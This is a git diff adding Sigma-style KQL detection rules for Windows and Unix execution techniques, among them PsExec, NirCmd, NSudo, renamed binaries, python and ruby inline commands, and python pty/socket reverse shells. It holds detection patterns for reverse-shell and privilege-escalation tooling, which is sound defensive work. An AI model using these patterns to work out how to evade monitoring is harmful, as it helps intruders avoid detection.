/dev/null +++ b/KQL/rules/Execution/psexec_execution.kql @@ -0,0 +1,12 @@ +// Title: Psexec Execution +// Author: omkar72 +// Date: 2020-10-30 +// Level: medium +// Description: Detects user accept agreement execution in psexec commandline +// MITRE Tactic: Execution +// Tags: attack.execution, attack.lateral-movement, attack.t1569, attack.t1021 +// False Positives: +// - Administrative scripts. + +DeviceProcessEvents +| where FolderPath endswith "\\psexec.exe" or ProcessVersionInfoOriginalFileName =~ "psexec.c" \ No newline at end of file diff --git a/KQL/rules/Execution/psexec_service_child_process_execution_as_local_system.kql b/KQL/rules/Execution/psexec_service_child_process_execution_as_local_system.kql new file mode 100644 index 00000000..09046461 --- /dev/null +++ b/KQL/rules/Execution/psexec_service_child_process_execution_as_local_system.kql @@ -0,0 +1,12 @@ +// Title: PsExec Service Child Process Execution as LOCAL SYSTEM +// Author: Florian Roth (Nextron Systems) +// Date: 2022-07-21 +// Level: high +// Description: Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account) +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension + +DeviceProcessEvents +| where InitiatingProcessFolderPath =~ "C:\\Windows\\PSEXESVC.exe" and (AccountName contains "AUTHORI" or AccountName contains "AUTORI") \ No newline at end of file diff --git a/KQL/rules/Execution/psexec_service_execution.kql b/KQL/rules/Execution/psexec_service_execution.kql new file mode 100644 index 00000000..56742b39 --- /dev/null +++ b/KQL/rules/Execution/psexec_service_execution.kql @@ -0,0 +1,12 @@ +// Title: PsExec Service Execution +// Author: Thomas Patzke, Romaissa Adjailia, Florian Roth (Nextron Systems) +// Date: 2017-06-12 +// Level: medium +// Description: Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Legitimate administrative tasks + +DeviceProcessEvents +| where FolderPath =~ "C:\\Windows\\PSEXESVC.exe" or ProcessVersionInfoOriginalFileName =~ "psexesvc.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/psexec_service_file_creation.kql b/KQL/rules/Execution/psexec_service_file_creation.kql new file mode 100644 index 00000000..b1087ac5 --- /dev/null +++ b/KQL/rules/Execution/psexec_service_file_creation.kql @@ -0,0 +1,10 @@ +// Title: PsExec Service File Creation +// Author: Thomas Patzke +// Date: 2017-06-12 +// Level: low +// Description: Detects default PsExec service filename which indicates PsExec service installation and execution +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1569.002, attack.s0029 + +DeviceFileEvents +| where FolderPath endswith "\\PSEXESVC.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/pua_advancedrun_execution.kql b/KQL/rules/Execution/pua_advancedrun_execution.kql new file mode 100644 index 00000000..6e2ae8db --- /dev/null +++ b/KQL/rules/Execution/pua_advancedrun_execution.kql @@ -0,0 +1,10 @@ +// Title: PUA - AdvancedRun Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-01-20 +// Level: medium +// Description: Detects the execution of AdvancedRun utility +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.privilege-escalation, attack.t1564.003, attack.t1134.002, attack.t1059.003 + +DeviceProcessEvents +| where ProcessVersionInfoOriginalFileName =~ "AdvancedRun.exe" or (ProcessCommandLine contains " /EXEFilename " and ProcessCommandLine contains " /Run") or (ProcessCommandLine contains " /WindowState 0" and ProcessCommandLine contains " /RunAs " and ProcessCommandLine contains " /CommandLine ") \ No newline at end of file diff --git a/KQL/rules/Execution/pua_nircmd_execution.kql b/KQL/rules/Execution/pua_nircmd_execution.kql new file mode 100644 index 00000000..b63c5e66 --- /dev/null +++ b/KQL/rules/Execution/pua_nircmd_execution.kql @@ -0,0 +1,12 @@ +// Title: PUA - NirCmd Execution +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-01-24 +// Level: medium +// Description: Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1569.002, attack.s0029 +// False Positives: +// - Legitimate use by administrators + +DeviceProcessEvents +| where ((ProcessCommandLine contains " execmd " or ProcessCommandLine contains ".exe script " or ProcessCommandLine contains ".exe shexec " or ProcessCommandLine contains " runinteractive ") or (FolderPath endswith "\\NirCmd.exe" or ProcessVersionInfoOriginalFileName =~ "NirCmd.exe")) or ((ProcessCommandLine contains " exec " or ProcessCommandLine contains " exec2 ") and (ProcessCommandLine contains " show " or ProcessCommandLine contains " hide ")) \ No newline at end of file diff --git a/KQL/rules/Execution/pua_nircmd_execution_as_local_system.kql b/KQL/rules/Execution/pua_nircmd_execution_as_local_system.kql new file mode 100644 index 00000000..b7733538 --- /dev/null +++ b/KQL/rules/Execution/pua_nircmd_execution_as_local_system.kql @@ -0,0 +1,12 @@ +// Title: PUA - NirCmd Execution As LOCAL SYSTEM +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-01-24 +// Level: high +// Description: Detects the use of NirCmd tool for command execution as SYSTEM user +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1569.002, attack.s0029 +// False Positives: +// - Legitimate use by administrators + +DeviceProcessEvents +| where ProcessCommandLine contains " runassystem " \ No newline at end of file diff --git a/KQL/rules/Execution/pua_nsudo_execution.kql b/KQL/rules/Execution/pua_nsudo_execution.kql new file mode 100644 index 00000000..6a97abed --- /dev/null +++ b/KQL/rules/Execution/pua_nsudo_execution.kql @@ -0,0 +1,12 @@ +// Title: PUA - NSudo Execution +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali +// Date: 2022-01-24 +// Level: high +// Description: Detects the use of NSudo tool for command execution +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1569.002, attack.s0029 +// False Positives: +// - Legitimate use by administrators + +DeviceProcessEvents +| where (ProcessCommandLine contains "-U:S " or ProcessCommandLine contains "-U:T " or ProcessCommandLine contains "-U:E " or ProcessCommandLine contains "-P:E " or ProcessCommandLine contains "-M:S " or ProcessCommandLine contains "-M:H " or ProcessCommandLine contains "-U=S " or ProcessCommandLine contains "-U=T " or ProcessCommandLine contains "-U=E " or ProcessCommandLine contains "-P=E " or ProcessCommandLine contains "-M=S " or ProcessCommandLine contains "-M=H " or ProcessCommandLine contains "-ShowWindowMode:Hide") and ((FolderPath endswith "\\NSudo.exe" or FolderPath endswith "\\NSudoLC.exe" or FolderPath endswith "\\NSudoLG.exe") or (ProcessVersionInfoOriginalFileName in~ ("NSudo.exe", "NSudoLC.exe", "NSudoLG.exe"))) \ No newline at end of file diff --git a/KQL/rules/Execution/pua_radmin_viewer_utility_execution.kql b/KQL/rules/Execution/pua_radmin_viewer_utility_execution.kql new file mode 100644 index 00000000..b5afa733 --- /dev/null +++ b/KQL/rules/Execution/pua_radmin_viewer_utility_execution.kql @@ -0,0 +1,10 @@ +// Title: PUA - Radmin Viewer Utility Execution +// Author: frack113 +// Date: 2022-01-22 +// Level: medium +// Description: Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines +// MITRE Tactic: Execution +// Tags: attack.execution, attack.lateral-movement, attack.t1072 + +DeviceProcessEvents +| where ProcessVersionInfoFileDescription =~ "Radmin Viewer" or ProcessVersionInfoProductName =~ "Radmin Viewer" or ProcessVersionInfoOriginalFileName =~ "Radmin.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/pua_runxcmd_execution.kql b/KQL/rules/Execution/pua_runxcmd_execution.kql new file mode 100644 index 00000000..9f1eaeaf --- /dev/null +++ b/KQL/rules/Execution/pua_runxcmd_execution.kql @@ -0,0 +1,12 @@ +// Title: PUA - RunXCmd Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-01-24 +// Level: high +// Description: Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1569.002, attack.s0029 +// False Positives: +// - Legitimate use by administrators + +DeviceProcessEvents +| where (ProcessCommandLine contains " /account=system " or ProcessCommandLine contains " /account=ti ") and ProcessCommandLine contains "/exec=" \ No newline at end of file diff --git a/KQL/rules/Execution/pua_wsudo_suspicious_execution.kql b/KQL/rules/Execution/pua_wsudo_suspicious_execution.kql new file mode 100644 index 00000000..462dc670 --- /dev/null +++ b/KQL/rules/Execution/pua_wsudo_suspicious_execution.kql @@ -0,0 +1,10 @@ +// Title: PUA - Wsudo Suspicious Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-12-02 +// Level: high +// Description: Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc) +// MITRE Tactic: Execution +// Tags: attack.execution, attack.privilege-escalation, attack.t1059 + +DeviceProcessEvents +| where (ProcessCommandLine contains "-u System" or ProcessCommandLine contains "-uSystem" or ProcessCommandLine contains "-u TrustedInstaller" or ProcessCommandLine contains "-uTrustedInstaller" or ProcessCommandLine contains " --ti ") or (FolderPath endswith "\\wsudo.exe" or ProcessVersionInfoOriginalFileName =~ "wsudo.exe" or ProcessVersionInfoFileDescription =~ "Windows sudo utility" or InitiatingProcessFolderPath endswith "\\wsudo-bridge.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/python_inline_command_execution.kql b/KQL/rules/Execution/python_inline_command_execution.kql new file mode 100644 index 00000000..7156c54c --- /dev/null +++ b/KQL/rules/Execution/python_inline_command_execution.kql @@ -0,0 +1,12 @@ +// Title: Python Inline Command Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-02 +// Level: medium +// Description: Detects execution of python using the "-c" flag. This is could be used as a way to launch a reverse shell or execute live python code. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 +// False Positives: +// - Python libraries that use a flag starting with "-c". Filter according to your environment + +DeviceProcessEvents +| where (ProcessCommandLine contains " -c" and (ProcessVersionInfoOriginalFileName =~ "python.exe" or (FolderPath endswith "python.exe" or FolderPath endswith "python3.exe" or FolderPath endswith "python2.exe"))) and (not(((InitiatingProcessCommandLine contains "-E -s -m ensurepip -U --default-pip" and InitiatingProcessFolderPath endswith "\\python.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Python" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Python")) or ((ProcessCommandLine contains "-W ignore::DeprecationWarning" and ProcessCommandLine contains "['install', '--no-cache-dir', '--no-index', '--find-links'," and ProcessCommandLine contains "'--upgrade', 'pip'") and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Python" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Python"))))) and (not(((ProcessCommandLine contains "" and ProcessCommandLine contains "exec(compile(") or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft VS Code\\Code.exe", "C:\\Program Files (x86)\\Microsoft VS Code\\Code.exe")))))) \ No newline at end of file diff --git a/KQL/rules/Execution/python_reverse_shell_execution_via_pty_and_socket_modules.kql b/KQL/rules/Execution/python_reverse_shell_execution_via_pty_and_socket_modules.kql new file mode 100644 index 00000000..b4a96c2a --- /dev/null +++ b/KQL/rules/Execution/python_reverse_shell_execution_via_pty_and_socket_modules.kql @@ -0,0 +1,11 @@ +// Title: Python Reverse Shell Execution Via PTY And Socket Modules +// Author: @d4ns4n_, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-24 +// Level: high +// Description: Detects the execution of python with calls to the socket and pty module in order to connect and spawn a potential reverse shell. + +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents +| where (ProcessCommandLine contains " -c " and ProcessCommandLine contains "import" and ProcessCommandLine contains "pty" and ProcessCommandLine contains "socket" and ProcessCommandLine contains "spawn" and ProcessCommandLine contains ".connect") and FolderPath contains "python" \ No newline at end of file diff --git a/KQL/rules/Execution/python_spawning_pretty_tty_on_windows.kql b/KQL/rules/Execution/python_spawning_pretty_tty_on_windows.kql new file mode 100644 index 00000000..235e05ac --- /dev/null +++ b/KQL/rules/Execution/python_spawning_pretty_tty_on_windows.kql @@ -0,0 +1,10 @@ +// Title: Python Spawning Pretty TTY on Windows +// Author: Nextron Systems +// Date: 2022-06-03 +// Level: high +// Description: Detects python spawning a pretty tty +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceProcessEvents +| where (FolderPath endswith "python.exe" or FolderPath endswith "python3.exe" or FolderPath endswith "python2.exe") and ((ProcessCommandLine contains "import pty" and ProcessCommandLine contains ".spawn(") or ProcessCommandLine contains "from pty import spawn") \ No newline at end of file diff --git a/KQL/rules/Execution/python_spawning_pretty_tty_via_pty_module.kql b/KQL/rules/Execution/python_spawning_pretty_tty_via_pty_module.kql new file mode 100644 index 00000000..fbb6a34e --- /dev/null +++ b/KQL/rules/Execution/python_spawning_pretty_tty_via_pty_module.kql @@ -0,0 +1,11 @@ +// Title: Python Spawning Pretty TTY Via PTY Module +// Author: Nextron Systems +// Date: 2022-06-03 +// Level: medium +// Description: Detects a python process calling to the PTY module in order to spawn a pretty tty which could be indicative of potential reverse shell activity. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceProcessEvents +| where (ProcessCommandLine contains "import pty" or ProcessCommandLine contains "from pty ") and ProcessCommandLine contains "spawn" and ((FolderPath endswith "/python" or FolderPath endswith "/python2" or FolderPath endswith "/python3") or (FolderPath contains "/python2." or FolderPath contains "/python3.")) \ No newline at end of file diff --git a/KQL/rules/Execution/query_usage_to_exfil_data.kql b/KQL/rules/Execution/query_usage_to_exfil_data.kql new file mode 100644 index 00000000..1939f522 --- /dev/null +++ b/KQL/rules/Execution/query_usage_to_exfil_data.kql @@ -0,0 +1,10 @@ +// Title: Query Usage To Exfil Data +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-01 +// Level: medium +// Description: Detects usage of "query.exe" a system binary to exfil information such as "sessions" and "processes" for later use +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents +| where (ProcessCommandLine contains "session >" or ProcessCommandLine contains "process >") and FolderPath endswith ":\\Windows\\System32\\query.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/read_contents_from_stdin_via_cmd_exe.kql b/KQL/rules/Execution/read_contents_from_stdin_via_cmd_exe.kql new file mode 100644 index 00000000..281ffec0 --- /dev/null +++ b/KQL/rules/Execution/read_contents_from_stdin_via_cmd_exe.kql @@ -0,0 +1,10 @@ +// Title: Read Contents From Stdin Via Cmd.EXE +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-07 +// Level: medium +// Description: Detect the use of "<" to read and potentially execute a file via cmd.exe +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.003 + +DeviceProcessEvents +| where ProcessCommandLine contains "<" and (ProcessVersionInfoOriginalFileName =~ "Cmd.Exe" or FolderPath endswith "\\cmd.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/rebuild_performance_counter_values_via_lodctr_exe.kql b/KQL/rules/Execution/rebuild_performance_counter_values_via_lodctr_exe.kql new file mode 100644 index 00000000..84cb2c88 --- /dev/null +++ b/KQL/rules/Execution/rebuild_performance_counter_values_via_lodctr_exe.kql @@ -0,0 +1,12 @@ +// Title: Rebuild Performance Counter Values Via Lodctr.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-15 +// Level: medium +// Description: Detects the execution of "lodctr.exe" to rebuild the performance counter registry values. This can be abused by attackers by providing a malicious config file to overwrite performance counter configuration to confuse and evade monitoring and security solutions. +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Legitimate usage by an administrator + +DeviceProcessEvents +| where (ProcessCommandLine contains " -r" or ProcessCommandLine contains " /r" or ProcessCommandLine contains " –r" or ProcessCommandLine contains " —r" or ProcessCommandLine contains " ―r") and (FolderPath endswith "\\lodctr.exe" and ProcessVersionInfoOriginalFileName =~ "LODCTR.EXE") \ No newline at end of file diff --git a/KQL/rules/Execution/remcom_service_file_creation.kql b/KQL/rules/Execution/remcom_service_file_creation.kql new file mode 100644 index 00000000..9a539835 --- /dev/null +++ b/KQL/rules/Execution/remcom_service_file_creation.kql @@ -0,0 +1,10 @@ +// Title: RemCom Service File Creation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-04 +// Level: medium +// Description: Detects default RemCom service filename which indicates RemCom service installation and execution +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1569.002, attack.s0029 + +DeviceFileEvents +| where FolderPath endswith "\\RemComSvc.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/remote_access_tool_anydesk_execution_with_known_revoked_signing_certificate.kql b/KQL/rules/Execution/remote_access_tool_anydesk_execution_with_known_revoked_signing_certificate.kql new file mode 100644 index 00000000..da1cace6 --- /dev/null +++ b/KQL/rules/Execution/remote_access_tool_anydesk_execution_with_known_revoked_signing_certificate.kql @@ -0,0 +1,16 @@ +// Title: Remote Access Tool - AnyDesk Execution With Known Revoked Signing Certificate +// Author: Sai Prashanth Pulisetti, Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-02-08 +// Level: medium +// Description: Detects the execution of an AnyDesk binary with a version prior to 8.0.8. +Prior to version 8.0.8, the Anydesk application used a signing certificate that got compromised by threat actors. +Use this rule to detect instances of older versions of Anydesk using the compromised certificate +This is recommended in order to avoid attackers leveraging the certificate and signing their binaries to bypass detections. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.initial-access +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ((FolderPath endswith "\\AnyDesk.exe" or ProcessVersionInfoFileDescription =~ "AnyDesk" or ProcessVersionInfoProductName =~ "AnyDesk" or ProcessVersionInfoCompanyName =~ "AnyDesk Software GmbH") and (ProcessVersionInfoProductVersion startswith "7.0." or ProcessVersionInfoProductVersion startswith "7.1." or ProcessVersionInfoProductVersion startswith "8.0.1" or ProcessVersionInfoProductVersion startswith "8.0.2" or ProcessVersionInfoProductVersion startswith "8.0.3" or ProcessVersionInfoProductVersion startswith "8.0.4" or ProcessVersionInfoProductVersion startswith "8.0.5" or ProcessVersionInfoProductVersion startswith "8.0.6" or ProcessVersionInfoProductVersion startswith "8.0.7")) and (not((ProcessCommandLine contains " --remove" or ProcessCommandLine contains " --uninstall"))) \ No newline at end of file diff --git a/KQL/rules/Execution/remote_access_tool_screenconnect_remote_command_execution.kql b/KQL/rules/Execution/remote_access_tool_screenconnect_remote_command_execution.kql new file mode 100644 index 00000000..a7e2f8ec --- /dev/null +++ b/KQL/rules/Execution/remote_access_tool_screenconnect_remote_command_execution.kql @@ -0,0 +1,12 @@ +// Title: Remote Access Tool - ScreenConnect Remote Command Execution +// Author: Ali Alwashali +// Date: 2023-10-10 +// Level: low +// Description: Detects the execution of a system command via the ScreenConnect RMM service. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.003 +// False Positives: +// - Legitimate use of ScreenConnect. Disable this rule if ScreenConnect is heavily used. + +DeviceProcessEvents +| where ProcessCommandLine contains "\\TEMP\\ScreenConnect\\" and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") and InitiatingProcessFolderPath endswith "\\ScreenConnect.ClientService.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/remote_access_tool_screenconnect_temporary_file.kql b/KQL/rules/Execution/remote_access_tool_screenconnect_temporary_file.kql new file mode 100644 index 00000000..10e57e1f --- /dev/null +++ b/KQL/rules/Execution/remote_access_tool_screenconnect_temporary_file.kql @@ -0,0 +1,14 @@ +// Title: Remote Access Tool - ScreenConnect Temporary File +// Author: Ali Alwashali +// Date: 2023-10-10 +// Level: low +// Description: Detects the creation of files in a specific location by ScreenConnect RMM. +ScreenConnect has feature to remotely execute binaries on a target machine. These binaries will be dropped to ":\Users\\Documents\ConnectWiseControl\Temp\" before execution. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.003 +// False Positives: +// - Legitimate use of ScreenConnect + +DeviceFileEvents +| where InitiatingProcessFolderPath endswith "\\ScreenConnect.WindowsClient.exe" and FolderPath contains "\\Documents\\ConnectWiseControl\\Temp\\" \ No newline at end of file diff --git a/KQL/rules/Execution/remote_dll_load_via_rundll32_exe.kql b/KQL/rules/Execution/remote_dll_load_via_rundll32_exe.kql new file mode 100644 index 00000000..97a8b480 --- /dev/null +++ b/KQL/rules/Execution/remote_dll_load_via_rundll32_exe.kql @@ -0,0 +1,10 @@ +// Title: Remote DLL Load Via Rundll32.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-09-18 +// Level: medium +// Description: Detects a remote DLL load event via "rundll32.exe". +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.002 + +DeviceImageLoadEvents +| where FolderPath startswith "\\\\" and InitiatingProcessFolderPath endswith "\\rundll32.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/remote_powershell_session_host_process_winrm_.kql b/KQL/rules/Execution/remote_powershell_session_host_process_winrm_.kql new file mode 100644 index 00000000..65dc81c2 --- /dev/null +++ b/KQL/rules/Execution/remote_powershell_session_host_process_winrm_.kql @@ -0,0 +1,12 @@ +// Title: Remote PowerShell Session Host Process (WinRM) +// Author: Roberto Rodriguez @Cyb3rWard0g +// Date: 2019-09-12 +// Level: medium +// Description: Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session). +// MITRE Tactic: Execution +// Tags: attack.execution, attack.lateral-movement, attack.t1059.001, attack.t1021.006 +// False Positives: +// - Legitimate usage of remote Powershell, e.g. for monitoring purposes. + +DeviceProcessEvents +| where FolderPath endswith "\\wsmprovhost.exe" or InitiatingProcessFolderPath endswith "\\wsmprovhost.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/renamed_curl_exe_execution.kql b/KQL/rules/Execution/renamed_curl_exe_execution.kql new file mode 100644 index 00000000..be3e657b --- /dev/null +++ b/KQL/rules/Execution/renamed_curl_exe_execution.kql @@ -0,0 +1,10 @@ +// Title: Renamed CURL.EXE Execution +// Author: X__Junior (Nextron Systems) +// Date: 2023-09-11 +// Level: medium +// Description: Detects the execution of a renamed "CURL.exe" binary based on the PE metadata fields +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202 + +DeviceProcessEvents +| where (ProcessVersionInfoOriginalFileName =~ "curl.exe" or ProcessVersionInfoFileDescription =~ "The curl executable") and (not(FolderPath contains "\\curl")) \ No newline at end of file diff --git a/KQL/rules/Execution/renamed_ftp_exe_execution.kql b/KQL/rules/Execution/renamed_ftp_exe_execution.kql new file mode 100644 index 00000000..a5133238 --- /dev/null +++ b/KQL/rules/Execution/renamed_ftp_exe_execution.kql @@ -0,0 +1,10 @@ +// Title: Renamed FTP.EXE Execution +// Author: Victor Sergeev, oscd.community +// Date: 2020-10-09 +// Level: medium +// Description: Detects the execution of a renamed "ftp.exe" binary based on the PE metadata fields +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202 + +DeviceProcessEvents +| where ProcessVersionInfoOriginalFileName =~ "ftp.exe" and (not(FolderPath endswith "\\ftp.exe")) \ No newline at end of file diff --git a/KQL/rules/Execution/renamed_jusched_exe_execution.kql b/KQL/rules/Execution/renamed_jusched_exe_execution.kql new file mode 100644 index 00000000..bffe87f0 --- /dev/null +++ b/KQL/rules/Execution/renamed_jusched_exe_execution.kql @@ -0,0 +1,10 @@ +// Title: Renamed Jusched.EXE Execution +// Author: Markus Neis, Swisscom +// Date: 2019-06-04 +// Level: high +// Description: Detects the execution of a renamed "jusched.exe" as seen used by the cobalt group +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1036.003 + +DeviceProcessEvents +| where (ProcessVersionInfoFileDescription in~ ("Java Update Scheduler", "Java(TM) Update Scheduler")) and (not(FolderPath endswith "\\jusched.exe")) \ No newline at end of file diff --git a/KQL/rules/Execution/renamed_nircmd_exe_execution.kql b/KQL/rules/Execution/renamed_nircmd_exe_execution.kql new file mode 100644 index 00000000..7595782e --- /dev/null +++ b/KQL/rules/Execution/renamed_nircmd_exe_execution.kql @@ -0,0 +1,10 @@ +// Title: Renamed NirCmd.EXE Execution +// Author: X__Junior (Nextron Systems) +// Date: 2024-03-11 +// Level: high +// Description: Detects the execution of a renamed "NirCmd.exe" binary based on the PE metadata fields. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202 + +DeviceProcessEvents +| where ProcessVersionInfoOriginalFileName =~ "NirCmd.exe" and (not((FolderPath endswith "\\nircmd.exe" or FolderPath endswith "\\nircmdc.exe"))) \ No newline at end of file diff --git a/KQL/rules/Execution/renamed_pingcastle_binary_execution.kql b/KQL/rules/Execution/renamed_pingcastle_binary_execution.kql new file mode 100644 index 00000000..5e8b56e3 --- /dev/null +++ b/KQL/rules/Execution/renamed_pingcastle_binary_execution.kql @@ -0,0 +1,10 @@ +// Title: Renamed PingCastle Binary Execution +// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) +// Date: 2024-01-11 +// Level: high +// Description: Detects the execution of a renamed "PingCastle" binary based on the PE metadata fields. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202 + +DeviceProcessEvents +| where ((ProcessVersionInfoOriginalFileName in~ ("PingCastleReporting.exe", "PingCastleCloud.exe", "PingCastle.exe")) or (ProcessCommandLine contains "--scanner aclcheck" or ProcessCommandLine contains "--scanner antivirus" or ProcessCommandLine contains "--scanner computerversion" or ProcessCommandLine contains "--scanner foreignusers" or ProcessCommandLine contains "--scanner laps_bitlocker" or ProcessCommandLine contains "--scanner localadmin" or ProcessCommandLine contains "--scanner nullsession" or ProcessCommandLine contains "--scanner nullsession-trust" or ProcessCommandLine contains "--scanner oxidbindings" or ProcessCommandLine contains "--scanner remote" or ProcessCommandLine contains "--scanner share" or ProcessCommandLine contains "--scanner smb" or ProcessCommandLine contains "--scanner smb3querynetwork" or ProcessCommandLine contains "--scanner spooler" or ProcessCommandLine contains "--scanner startup" or ProcessCommandLine contains "--scanner zerologon") or ProcessCommandLine contains "--no-enum-limit" or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--level Full") or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--server ")) and (not((FolderPath endswith "\\PingCastleReporting.exe" or FolderPath endswith "\\PingCastleCloud.exe" or FolderPath endswith "\\PingCastle.exe"))) \ No newline at end of file diff --git a/KQL/rules/Execution/renamed_psexec_service_execution.kql b/KQL/rules/Execution/renamed_psexec_service_execution.kql new file mode 100644 index 00000000..8cf3205d --- /dev/null +++ b/KQL/rules/Execution/renamed_psexec_service_execution.kql @@ -0,0 +1,12 @@ +// Title: Renamed PsExec Service Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-07-21 +// Level: high +// Description: Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Legitimate administrative tasks + +DeviceProcessEvents +| where ProcessVersionInfoOriginalFileName =~ "psexesvc.exe" and (not(FolderPath =~ "C:\\Windows\\PSEXESVC.exe")) \ No newline at end of file diff --git a/KQL/rules/Execution/ruby_inline_command_execution.kql b/KQL/rules/Execution/ruby_inline_command_execution.kql new file mode 100644 index 00000000..4ad30b7c --- /dev/null +++ b/KQL/rules/Execution/ruby_inline_command_execution.kql @@ -0,0 +1,10 @@ +// Title: Ruby Inline Command Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-02 +// Level: medium +// Description: Detects execution of ruby using the "-e" flag. This is could be used as a way to launch a reverse shell or execute live ruby code. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceProcessEvents +| where ProcessCommandLine contains " -e" and (FolderPath endswith "\\ruby.exe" or ProcessVersionInfoOriginalFileName =~ "ruby.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/scheduled_cron_task_job_linux.kql b/KQL/rules/Execution/scheduled_cron_task_job_linux.kql new file mode 100644 index 00000000..779f7ee4 --- /dev/null +++ b/KQL/rules/Execution/scheduled_cron_task_job_linux.kql @@ -0,0 +1,12 @@ +// Title: Scheduled Cron Task/Job - Linux +// Author: Alejandro Ortuno, oscd.community +// Date: 2020-10-06 +// Level: medium +// Description: Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.003 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where ProcessCommandLine contains "/tmp/" and FolderPath endswith "crontab" \ No newline at end of file diff --git a/KQL/rules/Execution/scheduled_cron_task_job_macos.kql b/KQL/rules/Execution/scheduled_cron_task_job_macos.kql new file mode 100644 index 00000000..64b63d10 --- /dev/null +++ b/KQL/rules/Execution/scheduled_cron_task_job_macos.kql @@ -0,0 +1,12 @@ +// Title: Scheduled Cron Task/Job - MacOs +// Author: Alejandro Ortuno, oscd.community +// Date: 2020-10-06 +// Level: medium +// Description: Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.003 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where ProcessCommandLine contains "/tmp/" and FolderPath endswith "/crontab" \ No 